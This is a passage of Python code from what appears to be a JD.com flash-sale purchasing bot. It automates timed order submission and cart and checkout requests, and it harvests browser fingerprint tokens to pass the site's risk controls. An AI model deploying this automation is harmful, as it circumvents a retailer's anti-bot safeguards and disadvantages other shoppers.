'很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False else: def submit_seckill_order_request(sku_id, server_buy_time=int(time.time()), num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' payload = { 'skuId': sku_id, } if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://marathon.jd.com/seckill/seckill.action?skuId={0}&num={1}&rid={2}'.format( sku_id, num, server_buy_time), } retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = self.sess.post(url=url, headers=headers, params=payload, data=self.seckill_order_data.get(sku_id), timeout=(0.1, 0.08)) logger.info(resp.text) resp_json = parse_json(resp.text) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': '很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False self.request_info['submit_seckill_order_request'] = submit_seckill_order_request return server_buy_time, realy_buy_time def new_init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id zzz = self.item_zzz.get(sku_id) retry_count = 0 item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text while zzz is None: retry_count += 1 logger.info('加载订单') if not self.new_parse_item_detail_page(sku_id, item_page): if retry_count > 10: logger.error('无法获取zzz,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次加载订单失败', retry_count) retry_count += 1 time.sleep(1) if item_page_resp.status_code != requests.codes.OK or not item_page: item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text continue else: zzz = self.item_zzz.get(sku_id) area_id = parse_area_id(self.area_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.new_init_yuyue_buy_time(sku_id, item_page) if server_buy_time > int(time.time()): hasYuyue_match = re.search(r'"hasYuyue":"(.*)"', item_page) if hasYuyue_match: hasYuyue = hasYuyue_match.group(1) if hasYuyue == '0' or hasYuyue == 0: self.new_reserve(sku_id) elif hasYuyue == '1' or hasYuyue == 1: logger.info('商品已预约,跳过自动预约') else: logger.info('商品已开售,跳过自动预约') # 初始化加载订单请求方法 if fast_mode: get_confirm_order_page_request_headers = self.headers.copy() get_confirm_order_page_request_headers['Host'] = 'wq.jd.com' get_confirm_order_page_request_headers['dnt'] = '1' get_confirm_order_page_request_headers['referer'] = 'https://item.m.jd.com/' get_confirm_order_page_request_headers['sec-fetch-dest'] = 'document' get_confirm_order_page_request_headers['sec-fetch-mode'] = 'navigate' get_confirm_order_page_request_headers['sec-fetch-site'] = 'same-site' get_confirm_order_page_request_headers['sec-fetch-user'] = '?1' get_confirm_order_page_request_headers['upgrade-insecure-requests'] = '1' get_confirm_order_promise_uuid_headers = self.headers.copy() get_confirm_order_headers = self.headers.copy() def parsing_submit_page_data(html): data = dict() page_data = nested_parser('{', '}', html, 'token2') if '"errId":"0"' not in page_data: logger.error('加载订单页数据失败,响应数据:%s', page_data) raise AsstException('加载订单页数据失败') if isinstance(page_data, str): token2search = re.search(r'"token2":\"(.*)\"', page_data) if token2search: data['token2'] = token2search.group(1) skulistsearch = re.search(r'"skulist":\"(.*)\"', page_data) if skulistsearch: data['skulist'] = skulistsearch.group(1) traceIdsearch = re.search(r'"traceId":\"(.*)\"', page_data) if traceIdsearch: data['traceid'] = traceIdsearch.group(1) mainSkusearch = re.search(r'"promotion":({([^}])*})', page_data) if mainSkusearch: data['discountPrice'] = json.loads(mainSkusearch.group(1))['discountPrice'] cidsearch = re.search(r'"cid":\"(.*)\"', page_data) if cidsearch: data['cid'] = cidsearch.group(1).split('_')[2] sucPageTypesearch = re.search(r'"sucPageType":\"(.*)\"', page_data) if sucPageTypesearch: data['sucPageType'] = sucPageTypesearch.group(1) vender_cart = nested_parser('[', ']', page_data, '"jdShipment":') if isinstance(vender_cart, str): venderIdsearch = re.search(r'"venderId":\"(.*)\"', vender_cart) if venderIdsearch: data['venderId'] = venderIdsearch.group(1) jdShipmentsearch = re.search(r'"jdShipment":\"(.*)\"', vender_cart) if jdShipmentsearch: data['jdShipment'] = jdShipmentsearch.group(1) shipment_str = nested_inner_parser('[', ']', vender_cart, '"promiseSendPay":') if isinstance(shipment_str, str): shipment = json.loads(shipment_str) if shipment: data['shipment'] = shipment return data def parse_promise_uuid(resp_text): resp_json = nested_parser('{', '}', resp_text, "errId") if isinstance(resp_json, str): ship_effect = json.loads(resp_json) promise_uuid = ship_effect['pickshipment']['promiseUuid'] elif isinstance(resp_json, list): ship_effect = json.loads(resp_json[0]) promise_uuid = ship_effect['pickshipment']['promiseUuid'] else: promise_uuid = '' return promise_uuid def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): logger.info('加载订单页面请求') jxsid = str(int(time.time() * 1000)) + str(random.random())[2:7] url = 'https://wq.jd.com/deal/confirmorder/main?jxsid=' + jxsid sceneval = '2' referer_url = f'https://item.m.jd.com/product/{sku_id}.html?sceneval={sceneval}&jxsid={jxsid}' commlist = f'{sku_id},,1,{sku_id},1,0,0' confirm_order_page_params = f'{self.item_url_param.get(sku_id)}&commlist={commlist}' \ f'&wdref={parse.quote(referer_url, safe='')}' referer = f'{referer_url}&{confirm_order_page_params}' get_confirm_order_page_request_headers['Referer'] = referer_url get_confirm_order_promise_uuid_headers['Referer'] = referer if not self.get_submit_referer.get(sku_id): self.get_submit_referer[sku_id] = referer self.sess.cookies.set('_modc', zzz) retry_interval = config.retry_interval retry_count = 0 submit_page_data = self.get_submit_page_data.get(sku_id) while not submit_page_data: if retry_count >= 10: logger.error("加载订单页面请求失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_page_request_headers, params=confirm_order_page_params, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com')) resp_data = resp.body if resp_data.startswith("<!DOCTYPE html>"): submit_page_data = self.get_submit_page_data.get(sku_id) if not submit_page_data: submit_page_data = parsing_submit_page_data(resp_data) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) self.get_submit_page_data[sku_id] = submit_page_data break except Exception as e: logger.error("异常信息:%s", e) retry_count += 1 logger.info("商品%s第%s次加载订单页面请求失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) promise_uuid_retry_interval = 0.02 promise_uuid = self.get_promiseUuid.get(sku_id) if not promise_uuid: with self.sem: # 订单页参数请求 if not self.get_promiseUuid.get(sku_id): i = 0 while i < 8: try: shipeffect_params = { 'reg': 1 , 'action': 1 , 'reset': 1 , 'callback': f'preShipeffectCb{self.letterMap[i + 1]}' , 'r': random.random() , 'sceneval': 2 , 'traceid': submit_page_data.get('traceid') } logger.info('加载订单页参数请求') url = 'https://wq.jd.com/deal/mship/shipeffect' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_promise_uuid_headers, cookies=self.get_cookies_str_by_domain_or_path( 'wq.jd.com'), params=shipeffect_params) promise_uuid = parse_promise_uuid(resp.body) if promise_uuid is not None: self.get_promiseUuid[sku_id] = promise_uuid break # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() except Exception as e: logger.error("异常信息:%s", e) i += 1 logger.info("商品%s第%s次订单页参数请求失败,%s秒后重试", sku_id, i, promise_uuid_retry_interval) time.sleep(promise_uuid_retry_interval) submit_data = self.get_submit_data.get(sku_id) if not submit_data: with self.sem: # 订单参数处理 if not self.get_submit_data.get(sku_id): discountPrice = submit_page_data.pop('discountPrice', '') cid = submit_page_data.pop('cid', '') shipment = submit_page_data.pop('shipment', '') venderId = submit_page_data.pop('venderId', '') jdShipment = submit_page_data.pop('jdShipment', '') params_list = [] params_list.append( 'paytype=0&paychannel=1&action=1&reg=1&type=0&gpolicy=&platprice=0&pick=&savepayship=0&sceneval=2&setdefcoupon=0') params_list.append('&tuanfull=') params_list.append(submit_page_data.pop('sucPageType', '')) for key, value in submit_page_data.items(): params_list.append(f'&{key}={value}') params_list.append(f'&valuableskus={sku_id},{config.num},{discountPrice},{cid}') params_list.append(f'&commlist={commlist}') params_list.append('&dpid=&scan_orig=') # params_list.append(f'&dpid={?}') # params_list.append(f'&scan_orig={?}') # 处理shipment shipmentData = None shipName = None shipType = '0' for i, data in enumerate(shipment): shipType = data.get('type') if shipType == '0': shipmentData = data shipName = ["jd311", "jdjzd", "jd411"][i] break elif shipType == '1' \ or shipType == '2': shipmentData = data shipName = "shipsop" break elif shipType == '3' \ or shipType == '6': # var _ = new K.default(e,n,t,h,i); # _.supported ? u[_.name] = _ : p[_.name] = _; break elif shipType == '4': # "1" == n.selected && "0" == e.jdShipment && (e.isTenVideo = !0, # h.isTenVideo = !0, # h.fpbarTipLoc = e.isloc, # h.fpbarTipTen = !e.isloc); break elif shipType == '5': # var g, y, b = !1; # if (ce.supSopJd = !0, # e.smallProducts.length > 0) # (0, # D.default)(g = oe.smallShipments).call(g, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? u[r.name] = r : p[r.name] = r # }); # if (e.laProducts.length > 0) # (0, # D.default)(y = oe.largeShipments).call(y, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? (u[r.name] = r, # b = !0) : p[r.name] = r # }); # if (e.laProducts.length > 0) { # var w = new U.default(e,n,t,h,i); # w.supported && !b ? u[w.name] = w : p[w.name] = w # } break elif shipType == '7': # if ("1" == n.supported) { # var S = new G.default(e,n,t,h,i); # S.supported ? u[S.name] = S : p[S.name] = S # } break elif shipType == '8': # var x = new F.default(e,n,t,h,i); # x.supported && (u[x.name] = x); break elif shipType == '9': # var P = new M.default(e,n,t,h,i); # P.supported ? u[P.name] = P : p[P.name] = P; break elif shipType == '10': # var j = new H.default(e,n,t,h,i); # j.supported ? u[j.name] = j : p[j.name] = j break # else: # break # if not shipmentData: # raise AsstException('抢购失败,无法获取订单页收获地址数据,本次抢购结束') # exit(-1) if shipmentData.get('selected') != '1': raise AsstException('抢购失败,订单页收获地址未自动选择,本次抢购结束') exit(-1) ship_list = None promise_uuid_index = None if shipType == '0': ship_list = [''] * 25 promise_uuid_index = 22 elif shipType == '1': ship_list = [''] * 9 promise_uuid_index = 7 elif shipType == '2' \ or shipType == '5' \ or shipType == '9': ship_list = [''] * 20 promise_uuid_index = 17 elif shipType == '8': ship_list = [''] * 10 promise_uuid_index = 8 elif shipType == '10': ship_list = [''] * 5 promise_uuid_index = 4 else: ship_list = [''] * 25 promise_uuid_index = 22 shipId = shipmentData.get('id') ship_list[0] = shipType ship_list[1] = shipId if shipType in ['1', '2', '5', '9', '10']: ship_list[2] = venderId elif shipType == '8': ship_list[2] = '0' else: ship_list[17] = '0' ship_list[promise_uuid_index] = promise_uuid if shipType == '0': # 处理shipName if shipName == 'jd311': ship_list[2] = '4' ship_list[7] = '1' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') ship_list[20] = '' elif shipName == 'jdjzd': ship_list[2] = '6' ship_list[7] = '3' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') # t.calendarTag ship_list[18] = '' # t.calendarTag # && t.calendarTag.length # && (0, r.default)(y=t.calendarTag).call(y, function(e){return e.selected}).tagType || "" ship_list[20] = '' elif shipName == 'jd411': ship_list[2] = '5' ship_list[7] = '2' ship_list[11] = shipmentData.get('promiseSendPay') ship_list[5] = '0' ship_list[19] = '0' ship_list[21] = '0' ship_list[24] = '' elif shipType == '2': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '3' \ or shipType == '6': pass elif shipType == '5': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[15] = "1" if "shipsopjzd" == shipName: ship_list[15] = "2" ship_list[16] = ''# t.calendarTag # && t.calendarTag.length # && (0, c.default)(w=t.calendarTag).call(w, function(e){return e.selected}).tagType | | ""; ship_list[13] = '0' ship_list[19] = '' elif shipType == '7': pass elif shipType == '8': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = timeRange ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '立即送达' in timeRange: ship_list[7] = '1' else: ship_list[7] = '2' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '9': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') if '下单' in timeRange: ship_list[4] = '立即送达' elif timeRange: ship_list[4] = timeRange else: ship_list[4] = '' ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '下单' in timeRange: ship_list[14] = '1' elif timeRange: ship_list[14] = '2' else: ship_list[14] = '' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[14] = '' elif shipType == '10': pass else: pass params_list.append(f'&ship={parse.quote('|'.join(ship_list), safe='{|,:}")}') submit_data = ''.join(params_list) if submit_data: # 保存submit_data self.get_submit_data[sku_id] = submit_data return submit_data def submit_order_request(submit_data, count): # 新提交订单请求 logger.info('提交订单请求') submit_data = f'{submit_data}&r={random.random()}&callback=confirmCb{self.letterMap[count]}' get_confirm_order_headers['Referer'] = self.get_submit_referer.get(sku_id) try: resp = http_util.send_http_request(self.socket_client, url='https://wq.jd.com/deal/msubmit/confirm', method='GET', headers=get_confirm_order_headers, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com'), params=submit_data) response_data = resp.body if resp.status == requests.codes.OK: if response_data: if '"errId":"0"' in response_data: logger.info('订单提交完成,在手机APP中可以查看是否完成下单') return True else: logger.info('订单提交失败') logger.info(f'响应数据:\n{response_data}') return False else: logger.info('订单提交失败,响应码:%s', resp.status) return False else: logger.info('订单提交失败,响应码:%s', resp.status) logger.info(f'响应数据:\n{response_data}') return False except Exception as e: logger.error(e) return False else: def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): exit(-1) def submit_order_request(submit_data, count): exit(-1) self.request_info['get_confirm_order_page_request'] = get_confirm_order_page_request self.request_info['submit_order_request'] = submit_order_request return server_buy_time, realy_buy_time @check_login def buy_item_in_stock(self, sku_ids, area, wait_all=False, stock_interval=3, submit_retry=3, submit_interval=5): """根据库存自动下单商品 :param sku_ids: 商品id。可以设置多个商品,也可以带数量,如:'1234' 或 '1234,5678' 或 '1234:2' 或 '1234:2,5678:3' :param area: 地区id :param wait_all: 是否等所有商品都有货才一起下单,可选参数,默认False :param stock_interval: 查询库存时间间隔,可选参数,默认3秒 :param submit_retry: 提交订单失败后重试次数,可选参数,默认3次 :param submit_interval: 提交订单失败后重试时间间隔,可选参数,默认5秒 :return: """ items_dict = parse_sku_id(sku_ids) items_list = list(items_dict.keys()) area_id = parse_area_id(area=area) if not wait_all: logger.info('下单模式:%s 任一商品有货并且未下架均会尝试下单', items_list) while True: for (sku_id, count) in items_dict.items(): if not self.if_item_can_be_ordered(sku_ids={sku_id: count}, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', sku_id, stock_interval) else: logger.info('%s 满足下单条件,开始执行', sku_id) self._cancel_select_all_cart_item() self._add_or_change_cart_item(self.get_cart_detail(), sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) else: logger.info('下单模式:%s 所有都商品同时有货并且未下架才会尝试下单', items_list) while True: if not self.if_item_can_be_ordered(sku_ids=sku_ids, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', items_list, stock_interval) else: logger.info('%s 满足下单条件,开始执行', items_list) self._cancel_select_all_cart_item() shopping_cart = self.get_cart_detail() for (sku_id, count) in items_dict.items(): self._add_or_change_cart_item(shopping_cart, sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) @check_login def exec_reserve_seckill_by_time(self, config): """定时抢购`预约抢购商品` 一定要确保预约的商品在购物车中才能使用这种方式!!!否则只能用其他方式 预约抢购商品特点: 1.需要提前点击预约 2.大部分此类商品在预约后自动加入购物车,在购物车中可见但无法勾选✓,也无法进入到结算页面(重要特征) 3.到了抢购的时间点后,才能勾选并结算下单 注意: 1.请在抢购开始前手动清空购物车中此类无法勾选的商品!(因为脚本在执行清空购物车操作时,无法清空不能勾选的商品) """ if not config: raise AsstException('初始化配置为空!') self.config = config # 开抢前清空购物车 self.clear_cart() sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) # special_attrs = self.special_attrs.get(sku_id) # [前置]初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 1.初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) def start_func(): # 3.执行 if config.is_pass_cart is not True: sku_ids = {config.sku_id: config.num} add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品id为:%s', config.sku_id) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() # 初始化下单必须参数 def init_order_request_info(self): # 获取下单必须参数 br = self.br # 获取:ipLoc-djd、ipLocation if address_util.get_user_address(self) is not True: logger.error('获取地址信息失败,请重试!') exit(-1) if self.use_new: # 获取:eid、fp、jstub、token、sdkToken(默认为空) def jsCallback(data): # print(data) self.data = data if len(data) > 0: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var obj={};for(var count=0;count<20;count++){' 'try{obj=getJdEid()}catch(e){count++;sleep(500)}};return obj})()', jsCallback) count = 0 while True: if br.openUrl('https://idt.jd.com/paypwd/toUpdateOrForget/', jsFunc): if not len(self.data) > 0: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) else: # 获取:eid、fp、track_id、risk_control(默认为空) def jsCallback(data): # print(data) eid = data['eid'] fp = data['fp'] track_id = data['trackId'] if eid: self.eid = eid if fp: self.fp = fp if track_id: self.track_id = track_id if eid and fp and track_id: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var getCookie=function(name){' 'var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");' 'if(arr=document.cookie.match(reg)){return unescape(arr[2]);}else{return ' 'null;}},obj={eid:"",fp:"",trackId:""};for(var count=0;count<20;count++){' 'try{getJdEid(function(eid, fp, udfp){var trackId=getCookie("TrackID");' 'if(eid&&fp&&trackId){obj.eid=eid;obj.fp=fp;obj.trackId=trackId;return obj;}' 'else{count++;sleep(500)}})}catch(e){count++;sleep(500)}};return obj})()', jsCallback) # headers = { # # 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', # 'accept-encoding': 'gzip, deflate, br', # 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8', # 'cache-control': 'max-age=0', # 'dnt': '1', # 'sec-fetch-dest': 'document', # 'sec-fetch-mode': 'navigate', # 'sec-fetch-site': 'none', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', # } count = 0 while True: if br.openUrl('https://order.jd.com/center/list.action', jsFunc): if not self.eid or not self.fp or not self.track_id: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) if br: # 关闭浏览器 br.quit() def init_default_order_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() # config = self.config # 初始化添加购物车请求方法 add_cart_request_headers = self.headers.copy() if fast_mode: # add_cart_request_headers['cookie'] = cookie_str def add_cart_request(params): # 为提高性能,并发时先校验一次,不满足再进入锁 if not self.is_add_cart_request.get(0): i = 0 while i < 3: with self.sem: # 进入锁后,需进行二次校验,要确保只请求了一次 if not self.is_add_cart_request.get(0): logger.info('添加购物车请求') try: def res_func(_conn): while True: data = _conn.recv(1) _conn.invalidate() logger.info('添加购物车请求已接收-为提高抢购速度,已截断响应数据') return None url = 'https://cart.jd.com/gate.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=add_cart_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'cart.jd.com'), params=params, res_func=res_func) self.is_add_cart_request[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('添加购物车请求异常,开始第 %s 次重试,信息:%s', i, e) else: break else: def add_cart_request(params): i = 0 while i < 3: try: resp = self.sess.get(url='https://cart.jd.com/gate.action', headers=add_cart_request_headers, params=params, timeout=(0.2, 0.03)) if 'https://cart.jd.com/cart.action' in resp.url: # 套装商品加入购物车后直接跳转到购物车页面 result = True else: # 普通商品成功加入购物车后会跳转到提示 "商品已成功加入购物车!" 页面 soup = BeautifulSoup(resp.text, "html.parser") result = bool(soup.select('h3.ftx-02')) # [<h3 class="ftx-02">商品已成功加入购物车!</h3>] if result: logger.info('%s 已成功加入购物车', params['pid']) break else: i += 1 logger.error('%s 添加购物车失败,开始第 %s 次重试', params['pid'], i) logger.error('响应数据:%s', resp) except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('%s 添加购物车请求发送超时,开始第 %s 次重试', params['pid'], i) except requests.exceptions.ReadTimeout as e: logger.info('已发送添加到购物车请求,为提高抢购速度,已截断响应数据') break self.request_info['add_cart_request'] = add_cart_request get_checkout_page_request_headers = self.headers.copy() # 初始化订单结算页请求方法 if fast_mode and is_risk_control is False: # get_checkout_page_request_headers['cookie'] = cookie_str def get_checkout_page_request(params): logger.info('订单结算请求') i = 0 def res_func(conn): while True: data = conn.recv(1) conn.invalidate() logger.info('订单结算请求已接收-为提高抢购速度,已截断响应数据') return None if not self.is_get_checkout_page.get(0): while i < 3: try: url = 'https://trade.jd.com/shopping/order/getOrderInfo.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'trade.jd.com'), params=params, res_func=res_func) self.is_get_checkout_page[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('订单结算请求错误,开始第 %s 次重试,信息:%s', i, e) else: def get_checkout_page_request(params): i = 0 resp = None while i < 3: try: # url = 'https://cart.jd.com/gotoOrder.action' resp = self.sess.get(url='https://trade.jd.com/shopping/order/getOrderInfo.action', headers=get_checkout_page_request_headers, params=params, timeout=(0.2, 0.07)) if not response_status(resp): logger.error('获取订单结算页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") self.risk_control = get_tag_value(soup.select('input#riskControl'), 'value') # order_detail = { # 'address': soup.find('span', id='sendAddr').text[5:], # remove '寄送至: ' from the begin # 'receiver': soup.find('span', id='sendMobile').text[4:], # remove '收件人:' from the begin # 'total_price': soup.find('span', id='sumPayPriceId').text[1:], # remove '¥' from the begin # 'items': [] # } # T O D O: 这里可能会产生解析问题,待修复 # for item in soup.select('div.goods-list div.goods-items'): # div_tag = item.select('div.p-price')[0] # order_detail.get('items').append({ # 'name': get_tag_value(item.select('div.p-name a')), # 'price': get_tag_value(div_tag.select('strong.jd-price'))[2:], # remove '¥ ' from the begin # 'num': get_tag_value(div_tag.select('span.p-num'))[1:], # remove 'x' from the begin # 'state': get_tag_value(div_tag.select('span.p-state')) # in stock or out of stock # }) # logger.info("下单信息:%s", order_detail) # return order_detail return except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('订单结算页面数据连接超时,开始第 %s 次重试', i) except requests.exceptions.ReadTimeout as e: logger.info('已发送订单结算请求,为提高抢购速度,已截断响应数据') break except Exception as e: logger.error('订单结算页面数据解析异常(可以忽略),报错信息:%s', e) if resp: logger.error('resp.text:%s', resp.text) break self.request_info['get_checkout_page_request'] = get_checkout_page_request # 初始化提交订单请求方法 submit_order_request_data = { 'overseaPurchaseCookies': '', 'vendorRemarks': '[]', 'submitOrderParam.sopNotPutInvoice': 'false', 'submitOrderParam.trackID': 'TestTrackId', 'submitOrderParam.ignorePriceChange': '0', 'submitOrderParam.btSupport': '0', 'riskControl': self.risk_control, 'submitOrderParam.isBestCoupon': 1, 'submitOrderParam.jxj': 1, 'submitOrderParam.trackId': self.track_id, # T o d o: need to get trackId 'submitOrderParam.eid': self.eid, 'submitOrderParam.fp': self.fp, 'submitOrderParam.needCheck': 1 } submit_order_request_headers = { 'User-Agent': self.user_agent, 'Host': 'trade.jd.com', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action' } # 如果有密码则设置 payment_pwd = global_config.get('account', 'payment_pwd') if payment_pwd: submit_order_request_data['submitOrderParam.payPassword'] = encrypt_payment_pwd(payment_pwd) if fast_mode: # submit_order_request_headers['cookie'] = cookie_str def submit_order_request(): submit_order_request_data['riskControl'] = self.risk_control logger.info('提交订单请求') try: resp = http_util.send_http_request(self.socket_client, url='https://trade.jd.com/shopping/order/submitOrder.action', method='POST', headers=submit_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path('trade.jd.com'), data=submit_order_request_data) response_data = resp.body if response_data: try: resp_json = json.loads(response_data) if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 